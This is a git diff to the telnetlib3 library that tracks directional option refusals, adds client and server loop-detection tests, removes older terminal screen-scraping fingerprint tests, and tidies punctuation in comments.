bool: ): self.log.debug("recv DO %s on server end, refusing.", name_command(opt)) self.iac(WONT, opt) + self.directional_refusals.add(opt) elif self.client and opt in (LOGOUT,): raise ValueError(f"cannot recv DO {name_command(opt)} on client end (ignored).") elif opt == TM: @@ -2075,6 +2085,7 @@ def handle_will(self, opt: bytes) -> None: if opt in (NAWS, LINEMODE, SNDLOC) and self.client: self.log.debug("recv WILL %s on client end, refusing.", name_command(opt)) self.iac(DONT, opt) + self.directional_refusals.add(opt) return # Client declines MUD protocols unless explicitly opted in. if self.client and opt in _MUD_PROTOCOL_OPTIONS: @@ -2138,6 +2149,7 @@ def handle_will(self, opt: bytes) -> None: if not self.server and opt not in (CHARSET,): self.log.debug("recv WILL %s on client end, refusing.", name_command(opt)) self.iac(DONT, opt) + self.directional_refusals.add(opt) return # First, we need to acknowledge WILL with DO for all options @@ -2511,10 +2523,17 @@ def _handle_sb_naws(self, buf: collections.deque[bytes]) -> None: """Fire callback for IAC-SB-NAWS--SE (:rfc:`1073`).""" buf.popleft() if not self.remote_option.enabled(NAWS): - self.log.info( - "received IAC SB NAWS without receipt of IAC WILL NAWS -- assuming NAWS-enabled" - ) - self.remote_option[NAWS] = True + if self._in_loop_detection: + self.log.debug( + "received IAC SB NAWS without WILL NAWS during loop detection;" + " not assuming NAWS-enabled" + ) + else: + self.log.info( + "received IAC SB NAWS without receipt of IAC WILL NAWS" + " -- assuming NAWS-enabled" + ) + self.remote_option[NAWS] = True # note a similar formula: # # cols, rows = ((256 * buf[0]) + buf[1], @@ -2782,7 +2801,7 @@ def _handle_sb_linemode_slc(self, buf: collections.deque[bytes]) -> None: Callback handles IAC-SB-LINEMODE-SLC-. Processes SLC command function triplets found in ``buf`` and replies - with any changes. An empty reply is never sent — that would trigger + with any changes. An empty reply is never sent, that would trigger an infinite echo loop between client and server. """ if len(buf) % 3 != 0: diff --git a/telnetlib3/tests/test_client_shell.py b/telnetlib3/tests/test_client_shell.py index 2e2758a3..968bd641 100644 --- a/telnetlib3/tests/test_client_shell.py +++ b/telnetlib3/tests/test_client_shell.py @@ -1001,7 +1001,7 @@ async def test_linemode_edit_via_telsh(bind_host: str, unused_tcp_port: int) -> cmd = _client_cmd(bind_host, unused_tcp_port) def _interact(master_fd: int, proc: "subprocess.Popen[bytes]") -> bytes: - # Wait for the telsh prompt — LINEMODE negotiation has completed by then + # Wait for the telsh prompt, LINEMODE negotiation has completed by then buf = _pty_read(master_fd, marker=b"tel:sh>", timeout=12.0) # EC test: type "helo" + 0x7F (EC = delete-char) + "lo" + CR # LinemodeBuffer: "helo" → EC deletes 'o' → "hel" + "lo" → "hello", CR sends it diff --git a/telnetlib3/tests/test_fingerprinting.py b/telnetlib3/tests/test_fingerprinting.py index d172dc86..3f40864c 100644 --- a/telnetlib3/tests/test_fingerprinting.py +++ b/telnetlib3/tests/test_fingerprinting.py @@ -923,209 +923,10 @@ async def test_server_shell_syncterm(monkeypatch): assert "\x1b[0;40 D" in "".join(writer.written) and writer._closing -class _ErrorReader: - async def read(self, n): - raise ConnectionError("gone") - - -@pytest.mark.parametrize( - "reader_data,expect_match", - [ - pytest.param([b"\x1b[5;10R"], True, id="bytes_match"), - pytest.param(["\x1b[3;7R"], True, id="str_match"), - pytest.param([], False, id="timeout"), - pytest.param([""], False, id="empty"), - ], -) -@pytest.mark.asyncio -async def test_read_until_cpr(reader_data, expect_match): - match, buf = await fps._read_until_cpr(MockReader(reader_data), timeout=0.05) - assert (match is not None) == expect_match - - -@pytest.mark.asyncio -async def test_read_until_cpr_connection_error(): - match, _ = await fps._read_until_cpr(_ErrorReader(), timeout=0.05) - assert match is None - - -@pytest.mark.asyncio -async def test_make_send_recv(): - reader = MockReader([b"\x1b[1;1R"]) - writer = MockWriter() - send_recv = fps._make_send_recv(reader, writer) - match, _ = await send_recv("test\x1b[6n", timeout=0.05) - assert match is not None and "test\x1b[6n" in writer.written - - -@pytest.mark.parametrize( - "pos_data,expect_cursor_restore", - [ - pytest.param(b"\x1b[10;5R", True, id="with_position"), - pytest.param("", False, id="no_position"), - ], -) -@pytest.mark.asyncio -async def test_shielded_probe(pos_data, expect_cursor_restore): - reader = MockReader([pos_data, b"\x1b[1;1R"]) - writer = MockWriter() - await fps._shielded_probe( - reader, writer, number=1, name="Test", description="desc", sequence="payload", timeout=0.05 - ) - written = "".join(writer.written) - assert "1. Test" in written and "ok" in written - assert ("\x1b[10;5H" in written) == expect_cursor_restore - - -@pytest.mark.parametrize( - "reader_data,expected_count,expected_result", - [ - pytest.param( - [b"\x1bP1!~00AB\x1b\\\x1bP2!~0FFF\x1b\\"], 2, {1: 0x00AB, 2: 0x0FFF}, id="two_responses" - ), - pytest.param([], 5, {}, id="timeout"), - pytest.param([b"\x1bP1!~0042\x1b\\"], 3, {1: 0x0042}, id="partial"), - pytest.param(["\x1bP1!~00FF\x1b\\"], 1, {1: 0x00FF}, id="str_input"), - pytest.param([""], 1, {}, id="empty"), - ], -) -@pytest.mark.asyncio -async def test_blast_collect(reader_data, expected_count, expected_result): - results = await fps._blast_collect(MockReader(reader_data), expected_count, timeout=0.05) - assert results == expected_result - - -@pytest.mark.asyncio -async def test_blast_collect_connection_error(): - assert await fps._blast_collect(_ErrorReader(), expected=1, timeout=0.05) == {} - - -def _deccksr_responses(codes): - return b"".join(f"\x1bP{c}!~{c:04X}\x1b\\".encode() for c in codes) - - -_ALL_PRINTABLE = list(range(32, 127)) - - -@pytest.mark.asyncio -async def test_build_checksum_lookup(): - reader = MockReader([_deccksr_responses(_ALL_PRINTABLE)]) - table = await fps._build_checksum_lookup(reader, MockWriter(), cal_row=1, usable_cols=200) - assert len(table) == 95 and table[0x0020] == " " and table[0x0041] == "A" - - -@pytest.mark.parametrize( - "codes,usable_cols", - [ - pytest.param(_ALL_PRINTABLE[:1], 200, id="incomplete"), - pytest.param([c for c in _ALL_PRINTABLE if c != 65], 200, id="missing_A"), - ], -) -@pytest.mark.asyncio -async def test_build_checksum_lookup_fails(codes, usable_cols): - reader = MockReader([_deccksr_responses(codes)]) - table = await fps._build_checksum_lookup( - reader, MockWriter(), cal_row=1, usable_cols=usable_cols - ) - assert table == {} - - -@pytest.mark.asyncio -async def test_build_checksum_lookup_batched(): - batch_size = 10 - entries = [] - for offset in range(0, len(_ALL_PRINTABLE), batch_size): - entries.append(_deccksr_responses(_ALL_PRINTABLE[offset : offset + batch_size])) - reader = MockReader(entries) - table = await fps._build_checksum_lookup( - reader, MockWriter(), cal_row=1, usable_cols=batch_size - ) - assert len(table) == 95 - - -@pytest.mark.asyncio -async def test_blast_scrape(): - lookup = {0x0041: "A", 0x0020: " "} - resp = b"\x1bP0!~0041\x1b\\\x1bP1!~0020\x1b\\" - result = await fps._blast_scrape(MockReader([resp]), MockWriter(), 1, 2, lookup, timeout=0.5) - assert result.startswith("A") - - -@pytest.mark.asyncio -async def test_blast_scrape_unknown_checksum(): - lookup = {0x0041: "A", 0x0020: " "} - resp = b"\x1bP0!~0041\x1b\\\x1bP1!~BEEF\x1b\\" - result = await fps._blast_scrape(MockReader([resp]), MockWriter(), 1, 2, lookup, timeout=0.5) - assert "A" in result and "?0x" in result - - -@pytest.mark.parametrize( - "reader_data,rows,cols,expect_result", - [ - pytest.param([b"\x1bXCTerm:STS:10:Hello World \x1b\\"], 2, 10, True, id="success"), - pytest.param(["\x1bXCTerm:STS:10:Hello \x1b\\"], 1, 10, True, id="str_input"), - pytest.param([], 2, 10, False, id="timeout"), - pytest.param([""], 1, 10, False, id="empty"), - pytest.param([b"\x1bXCTerm:STS:10:AB\x1b\\"], 3, 10, True, id="short_content"), - ], -) -@pytest.mark.asyncio -async def test_scrape_screen_sts(reader_data, rows, cols, expect_result): - result = await fps.scrape_screen_sts(MockReader(reader_data), MockWriter(), rows, cols, 0.05) - if expect_result: - assert result is not None and result["method"] == "sts" - else: - assert result is None - - -def _scrape_reader(responses): - """MockReader for scrape_screen: inserts "" for drain loop after first CPR.""" - return MockReader([responses[0], ""] + list(responses[1:])) - - -_CAL_RESP = _deccksr_responses(_ALL_PRINTABLE) -_CPR = b"\x1b[5;1R" -_PROBE_OK = b"\x1bP9999!~0041\x1b\\" + _CPR -_Z_VERIFY = f"\x1bP1!~{ord('Z'):04X}\x1b\\".encode() + _CPR - - -@pytest.mark.parametrize( - "responses,rows,cols", - [ - pytest.param([_CPR, _CPR], 5, 96, id="no_decrqcra"), - pytest.param(["", ""], 5, 96, id="no_initial_cpr"), - pytest.param([_CPR, _PROBE_OK], 5, 96, id="lookup_fails"), - pytest.param( - [_CPR, _PROBE_OK, _CAL_RESP, b"\x1bP1!~FFFF\x1b\\" + _CPR], 5, 96, id="verify_fails" - ), - ], -) -@pytest.mark.asyncio -async def test_scrape_screen_fails(responses, rows, cols): - result = await fps.scrape_screen(_scrape_reader(responses), MockWriter(), rows, cols) - assert result is None - - -@pytest.mark.parametrize( - "alt_same", [pytest.param(True, id="alt_same"), pytest.param(False, id="alt_differs")] -) -@pytest.mark.asyncio -async def test_scrape_screen_success(alt_same): - rows, cols = 1, 96 - normal_resp = _deccksr_responses(range(rows * cols)) - alt_resp = normal_resp if alt_same else b"\x1bP0!~ABCD\x1b\\" * (rows * cols) - reader = _scrape_reader([_CPR, _PROBE_OK, _CAL_RESP, _Z_VERIFY, normal_resp, alt_resp]) - result = await fps.scrape_screen(reader, MockWriter(), rows, cols) - assert result is not None and result["decrqcra"] is True - assert ("screen_1" in result) != alt_same - - class _MockFPServer: - def __init__(self, exc=None, tasks=None, closing=False, term_label=None): + def __init__(self, exc=None, tasks=None, closing=False): self._closing = closing self.writer = MockWriter() - if term_label: - self.writer._tv_term_label = term_label self._tasks = tasks or [] self._exc_set = None self._eof_called = False @@ -1164,7 +965,7 @@ def cancel(self): raise RuntimeError("cancel failed") tasks = [MockTask() for _ in range(n_tasks)] - server = _MockFPServer(tasks=tasks, closing=closing, term_label="xterm") + server = _MockFPServer(tasks=tasks, closing=closing) fps.FingerprintingServer.connection_lost(server, exc) assert server._closing is True if not closing: @@ -1196,22 +997,18 @@ async def test_server_shell_with_linemode(monkeypatch): @requires_unix @pytest.mark.parametrize( - "term,extra_opts,exit_code,expect_encoding", + "term,extra_opts,expect_encoding", [ - pytest.param("xterm", {}, 0, None, id="normal"), - pytest.param("mudlet", {"GMCP": True}, 0, None, id="mud_client"), - pytest.param("xterm", {"ttype1": "MTTS 137"}, 0, None, id="mtts_mud"), - pytest.param("xterm", {}, 100, None, id="attack_exit_code"), - pytest.param("syncterm", {}, 0, "latin-1", id="syncterm_encoding"), + pytest.param("xterm", {}, None, id="normal"), + pytest.param("mudlet", {"GMCP": True}, None, id="mud_client"), + pytest.param("xterm", {"ttype1": "MTTS 137"}, None, id="mtts_mud"), + pytest.param("syncterm", {}, "latin-1", id="syncterm_encoding"), ], ) @pytest.mark.asyncio -async def test_server_shell_with_data_dir( - monkeypatch, tmp_path, term, extra_opts, exit_code, expect_encoding -): +async def test_server_shell_with_data_dir(monkeypatch, tmp_path, term, extra_opts, expect_encoding): monkeypatch.setattr(fps.asyncio, "sleep", _noop) monkeypatch.setattr(fps, "DATA_DIR", str(tmp_path)) - monkeypatch.setattr(fps, "_HAS_TV_DETECT", False) extra = {"peername": ("127.0.0.1", 12345), "TERM": term} extra.update({k: v for k, v in extra_opts.items() if not isinstance(v, bool)}) @@ -1223,7 +1020,7 @@ async def test_server_shell_with_data_dir( writer.remote_option[getattr(fps, k)] = v async def pty_with_exit(reader, writer, exe, args, raw_mode=False): - return exit_code + return 0 monkeypatch.setattr(server_pty_shell, "pty_shell", pty_with_exit) await fps.fingerprinting_server_shell(MockReader([]), writer) @@ -1237,7 +1034,6 @@ async def pty_with_exit(reader, writer, exe, args, raw_mode=False): async def test_server_shell_connection_reset(monkeypatch, tmp_path): monkeypatch.setattr(fps.asyncio, "sleep", _noop) monkeypatch.setattr(fps, "DATA_DIR", str(tmp_path)) - monkeypatch.setattr(fps, "_HAS_TV_DETECT", False) writer = MockWriter( extra={"peername": ("127.0.0.1", 12345), "TERM": "xterm"}, @@ -1475,3 +1271,41 @@ def test_fingerprinting_post_script_delegates(): with patch("telnetlib3.fingerprinting_display.fingerprinting_post_script") as mock_fps: fps.fingerprinting_post_script("/tmp/test.json") mock_fps.assert_called_once_with("/tmp/test.json") + + +@pytest.mark.asyncio +async def test_probe_client_loop_detection_no_loop(): + """Empty result when client does not re-negotiate already-agreed options.""" + w = _probe_writer() + w.remote_option[fps.BINARY] = True + w.remote_option[fps.SGA] = True + probe_results = {} + result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01) + assert result == [] + + +@pytest.mark.asyncio +async def test_probe_client_loop_detection_loops(): + """Option names returned when client re-negotiates after redundant DO/WILL.""" + w = _probe_writer() + w.remote_option[fps.BINARY] = True + # Override iac to simulate a loop-prone client that re-WILLs + orig_iac = w.iac + + def _looping_iac(cmd, opt): + orig_iac(cmd, opt) + w.remote_option._values[opt] = True + + w.iac = _looping_iac + probe_results = {} + result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01) + assert "BINARY" in result + + +@pytest.mark.asyncio +async def test_probe_client_loop_detection_no_agreed(): + """Empty result when no options are agreed.""" + w = _probe_writer() + probe_results = {} + result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01) + assert result == [] diff --git a/telnetlib3/tests/test_mccp.py b/telnetlib3/tests/test_mccp.py index fdd3d66a..3f32b484 100644 --- a/telnetlib3/tests/test_mccp.py +++ b/telnetlib3/tests/test_mccp.py @@ -455,7 +455,7 @@ async def test_compressed_write_fallback_after_end(self): server._mccp2_start() compressed_write = transport.write - # End compression — restores transport.write + # End compression, restores transport.write server._mccp2_end() # The closure should fallback to orig_write when compressor is None diff --git a/telnetlib3/tests/test_pty_shell.py b/telnetlib3/tests/test_pty_shell.py index 5f920268..a8108224 100644 --- a/telnetlib3/tests/test_pty_shell.py +++ b/telnetlib3/tests/test_pty_shell.py @@ -73,7 +73,7 @@ def _create(extra_info=None, capture_writes=False): else: writer.get_extra_info = MagicMock(side_effect=lambda k, d=None: extra_info.get(k, d)) # Ensure fn_encoding doesn't exist so _flush_output falls through to - # get_extra_info("charset") — MagicMock auto-creates it as a truthy mock. + # get_extra_info("charset"), MagicMock auto-creates it as a truthy mock. if hasattr(writer, "fn_encoding"): del writer.fn_encoding # Provide a real dict for remote_option so _schedule_ga works correctly. diff --git a/telnetlib3/tests/test_server_api.py b/telnetlib3/tests/test_server_api.py index 10be0905..826449a7 100644 --- a/telnetlib3/tests/test_server_api.py +++ b/telnetlib3/tests/test_server_api.py @@ -113,3 +113,45 @@ async def test_create_server_line_mode_default_false(bind_host, unused_tcp_port) writer.write(IAC + WONT + TTYPE) client = await asyncio.wait_for(server.wait_for_client(), 0.5) assert client.line_mode is False + + +async def test_enqueue_client_queue_full(): + """_enqueue_client discards oldest entry when bounded queue is full.""" + from telnetlib3.server import Server, _enqueue_client + from telnetlib3.server_base import BaseServer + + class _TestProto(BaseServer): + def connection_made(self, transport): + pass + + server = Server(None) + server._new_client = asyncio.Queue(maxsize=1) + + p1 = _TestProto(shell=lambda _: None, _waiter_connected=asyncio.Future()) + p1._waiter_connected.set_result(None) + _enqueue_client(server, p1) + assert server._new_client.qsize() == 1 + + p2 = _TestProto(shell=lambda _: None, _waiter_connected=asyncio.Future()) + p2._waiter_connected.set_result(None) + _enqueue_client(server, p2) + assert server._new_client.qsize() == 1 + + +async def test_register_protocol_prunes_dead(): + """_register_protocol removes closed protocols before appending.""" + from telnetlib3.server import Server + + class _FakeProto: + _closing = True + _waiter_connected = None + + class _LiveProto: + _closing = False + _waiter_connected = asyncio.Future() + + server = Server(None) + server._protocols = [_FakeProto()] + server._register_protocol(_LiveProto()) + assert len(server._protocols) == 1 + assert isinstance(server._protocols[0], _LiveProto) diff --git a/telnetlib3/tests/test_server_fingerprinting.py b/telnetlib3/tests/test_server_fingerprinting.py index 7943bdd9..fec6f2ae 100644 --- a/telnetlib3/tests/test_server_fingerprinting.py +++ b/telnetlib3/tests/test_server_fingerprinting.py @@ -55,6 +55,13 @@ def __init__(self, extra=None, will_options=None, wont_options=None): self.protocol = _MockProtocol() self._closing = False self._menu_inline: bool = False + self.rejected_will: set[bytes] = set() + self.rejected_do: set[bytes] = set() + self.directional_refusals: set[bytes] = set() + self._server = True + self._encoding_explicit: bool = False + self._esc_inline: bool = False + self.pending_option = MockOption() def get_extra_info(self, key, default=None): return self._extra.get(key, default) @@ -69,6 +76,9 @@ def iac(self, cmd, opt): def write(self, data): self._writes.append(data) + def _write(self, data, escape_iac=False): + self._writes.append(data) + async def drain(self): pass @@ -1437,3 +1447,65 @@ async def test_fingerprinting_shell_codepage_explicit_skips_utf8(tmp_path): await _run_fp(reader, writer, tmp_path, environ_encoding="cp437") assert b"1\r\n" not in writer._writes assert writer.environ_encoding == "cp437" + + +@pytest.mark.asyncio +async def test_probe_server_wrong_direction_correct_refuse(): + """Server correctly refuses wrong-direction DO/WILL with WONT/DONT.""" + writer = MockWriter() + writer.remote_option[fps.NAWS] = False + writer.remote_option[fps.TTYPE] = False + writer.local_option[fps.ECHO] = False + results = await sfp.probe_server_wrong_direction(writer, timeout=0.01) + assert results["NAWS"] == "correct-refuse" + assert results["TTYPE"] == "correct-refuse" + assert results["ECHO"] == "correct-refuse" + + +@pytest.mark.asyncio +async def test_probe_server_wrong_direction_wrong_accept(): + """Server accepts wrong-direction DO/WILL (role-unaware).""" + writer = MockWriter() + writer.remote_option[fps.NAWS] = True + writer.remote_option[fps.TTYPE] = True + writer.local_option[fps.ECHO] = True + results = await sfp.probe_server_wrong_direction(writer, timeout=0.01) + assert results["NAWS"] == "wrong-accept" + assert results["TTYPE"] == "wrong-accept" + assert results["ECHO"] == "wrong-accept" + + +@pytest.mark.asyncio +async def test_probe_server_loop_detection_no_loop(): + """Empty result when server does not re-negotiate already-agreed options.""" + writer = MockWriter() + writer.remote_option[fps.BINARY] = True + probe_results = {} + result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01) + assert result == [] + + +@pytest.mark.asyncio +async def test_probe_server_loop_detection_loops(): + """Option names returned when server re-negotiates after redundant DO/WILL.""" + writer = MockWriter() + writer.remote_option[fps.BINARY] = True + orig_iac = writer.iac + + def _looping_iac(cmd, opt): + orig_iac(cmd, opt) + writer.remote_option[opt] = True + + writer.iac = _looping_iac + probe_results = {} + result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01) + assert "BINARY" in result + + +@pytest.mark.asyncio +async def test_probe_server_loop_detection_no_agreed(): + """Empty result when no options are agreed.""" + writer = MockWriter() + probe_results = {} + result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01) + assert result == [] diff --git a/telnetlib3/tests/test_stream_writer_full.py b/telnetlib3/tests/test_stream_writer_full.py index 9249e52e..4ea409c0 100644 --- a/telnetlib3/tests/test_stream_writer_full.py +++ b/telnetlib3/tests/test_stream_writer_full.py @@ -1458,6 +1458,16 @@ def test_send_naws_and_handle_naws(): assert seen["sz"] == (200, 100) +def test_handle_sb_naws_defers_during_loop_detection(): + """SB NAWS during loop detection does not set remote_option to avoid false positives.""" + ws, _, _ = new_writer(server=True) + ws._in_loop_detection = True + payload = struct.pack("!HH", 100, 200) + buf = collections.deque([NAWS, payload[0:1], payload[1:2], payload[2:3], payload[3:4]]) + ws._handle_sb_naws(buf) + assert not ws.remote_option.enabled(NAWS) + + def test_handle_sb_lflow_toggles(): ws, _, _ = new_writer(server=True) ws.local_option[LFLOW] = True @@ -1697,3 +1707,19 @@ def test_receive_status_mixed_do_will_and_sb(caplog): assert any("agreed" in msg.lower() for msg in caplog.messages) assert any("NAWS 132x43" in msg for msg in caplog.messages) assert any("disagree" in msg.lower() for msg in caplog.messages) + + +def test_handle_do_server_directional_refusal(): + """Server end refuses DO for client-only options, tracked in directional_refusals.""" + w, t, _ = new_writer(server=True) + w.handle_do(TTYPE) + assert t.writes[-1] == IAC + WONT + TTYPE + assert TTYPE in w.directional_refusals + + +def test_handle_will_client_directional_refusal(): + """Client end refuses WILL for server-only options, tracked in directional_refusals.""" + w, t, _ = new_writer(server=False, client=True) + w.handle_will(TTYPE) + assert t.writes[-1] == IAC + DONT + TTYPE + assert TTYPE in w.directional_refusals